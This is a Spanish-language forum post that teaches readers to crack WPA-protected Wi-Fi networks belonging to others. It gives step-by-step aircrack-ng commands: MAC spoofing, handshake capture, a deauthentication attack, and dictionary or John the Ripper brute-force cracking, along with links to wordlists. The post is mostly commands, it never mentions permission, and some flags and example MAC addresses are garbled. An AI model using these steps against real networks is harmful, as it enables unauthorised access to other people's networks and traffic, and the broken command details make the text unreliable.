Hackear red WPA, con ubuntu 10.10 y 11.04, garantizado!! HOla amigos taringueros!!

Como lo prometido es deuda y en mi post anterior de "Hackear red wifi con ubuntu 11.04 (actualizado y corregido)" que dicho sea de paso funciona solo para claves wep, les comente que les traeria este post para hackear redes wifi con encriptacin wpa (PSK, TKIP y AES/CCMP). Pero antes me gustaria explicarles un poco que es la wpa, y bueno wpa es la abreviatura de Wifi Protect Access, y consiste en un mecanismo de control de acceso a una red inalmbrica, pensado con la idea de eliminar las debilidades de WEP. Tambin se le conoce con el nombre de TSN (Transition Security Network). Para realizar el crackeo de una red inalambrica con seguridad WPA habilitada tendremos que capturar una clave llamada Handshake, a travs de ella nos ser posible realizar el crackeo tanto con diccionarios o con bruteforce. Y para no perder mas el tiempo procedere a explicarles como hacerlo, para esto es conveniente que ya hayan trabajado antes con encriptaciones wep, que tengan instalado y corregido su aircrack-ng (solo para ubuntu 10.10 y 11.04), de lo contrario les recomiendo visiten mi post anterior, para que puedan continuar!! Aquii el link!! http://www.taringa.net/posts/linux/10561177/Hackear-red-wifi-con-ubuntu-11_04-_actualizado-ycorregido_.html o http://www.linkexterno.com/z7VbcU Despues de esto ya les sera facil seguir los siguientes pasos!!! Paso 0! Antes que nada en cada terminal que usemos debes de estar logeado como superusuario solo debes teclear sudo su y despues tu contrasea (nota, cuando ingreses tu contrasea los caracteres no apareceran!! pero no t preocupes todo va bn). Paso 1! airmon-ng start wlan0 Paso 2! airmon-ng start mon0 Paso 3! ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 Paso 4! ifconfig mon0 up Paso 5! airodump-ng mon0 Paso 6!

Identificar las redes inalmbricas disponibles as como las MAC y canales de las mismas: tomamos la que queremos hakear, ejemplo ESSID: INFINITUM1111 BSSID= 23:S4:23:44:5F:T4 Chanel: 6 Station: Est en la segunda linea, hay una columna llamada Station (00:11:22:33:44:55) debe de indicar el mismo BSSID de la red que queremos atacar en mi ejemplo sera Station=23:S4:23:44:5F:T4 Presionamos Ctrl+C

Paso 7! airodump-ng -c (canal de la red CH) -w (nombre con el que queremos guardar el archivo) --bssid (direccion mac delmodem seleccionado) mon0 ejemplo airodump-ng -c 6 -w contrasea --bssid 23:S4:23:44:5F:T4 mon0 Y como vemos hasta aqui hemos procedido como en el caso de las claves wep!! Paso 8! ABRIMOS UNA NUEVA TERMINAL!! Aqui procederemos a des-auntenticar para obtener el handshake!! aireplay-ng --deauth 1 -a [BSSID] -c mon0 ejemplo aireplay-ng --deauth 1 -a 23:S4:23:44:5F:T4 -c 23:S4:23:44:5F:T4 mon0 Regresamos a la primera terminal y vermos en la esquina superior derecha algo asi WPA handshake: [00:11:22:33:44:55] En mi caso fue WPA handshake: [23:S4:23:44:5F:T4]

Paso 9! Abrimos una nueva terminal o pestaa!! Buscamos por la red, descargamos un buen diccionario y corremos: aircrack-ng (nombre del archivo este lo pusimos en el paso numero 7).cap [Ruta diccionario] -w ejemplo aircrack-ng contrasea-01.cap -z [la ruta de donde hayas guardado tu diccionario...desktop/dic.txt] (ojo hay que agregar el -01.cap al nombre del archivo elegido en el paso 7!!) Y obtendremos la clave, dependiendo que tan larga y complicada est o que tan bueno est el diccionario. Esto es utilizando diccionario, pero tambien podemos utilizar la fuerza bruta hechando mano de John The Ripper. Para instalarlo escribimos: sudo apt-get install john Para hackear la red lo utilizamos como sigue: john -incremental=all --stdout | aircrack-ng -w - -e [ESSID nombre de la red] -a 2 (nombre del archivo este lo pusimos en el paso numero 7).cap ejemplo john -incremental=all --stdout | aircrack-ng -w - -e infinitum1111 -a 2 contrasea-01.cap Paso 10! Abrimos la ultima terminal!

aircrack-ng -z (nombre del archivo este lo pusimos en el paso numero 7).cap Y listo de cualquiera de las dos formas obtendras la contrasea!!! En mi particular punto de vista les recomiendo que utilizen diccionarios ya que John puede tardar desde unos minutos hasta semanas!! Si no cuentas con diccionarios aqui te dejo algunos links, te recomiendo los descargues todos y despues los unas, para que te sea mas facil y rapido hackear esa wpa tan tediosa!! Aqui te dejo los links para que descargues los mejores diccionarios, bueno al menos los que a mi me funcionan, recuerda descargalos todos y unelos para evitar ingresarlos de 1 x 1!! *http://www.linkexterno.com/lOrGVQ *http://www.linkexterno.com/atbypO *http://www.linkexterno.com/KSIqbJ *http://www.linkexterno.com/5XQ3G7 *http://www.linkexterno.com/u1B6kP *http://www.linkexterno.com/dVvmtQ *http://www.linkexterno.com/8Sgi8A *http://www.linkexterno.com/vdM6nj *http://www.linkexterno.com/BowFfX *http://www.linkexterno.com/cmHGbv *http://www.linkexterno.com/osgTd3 *http://www.linkexterno.com/1xF1Fu *http://www.linkexterno.com/B0sX2O *http://www.linkexterno.com/sOxzbu Recuerda lo mas importante para hackear una wpa es la paciencia, ya que es un poco mas dificil que hackear una wep!! Suerte amigos y comenten cualquier duda o error en mi post, les deseo de antemano que tengan suerte con las wpa!! Si les sirve dejen puntos!! jeje!!! Y no se olviden de seguir mis demas post que al igual que este funcionan y son faciles de entender!!!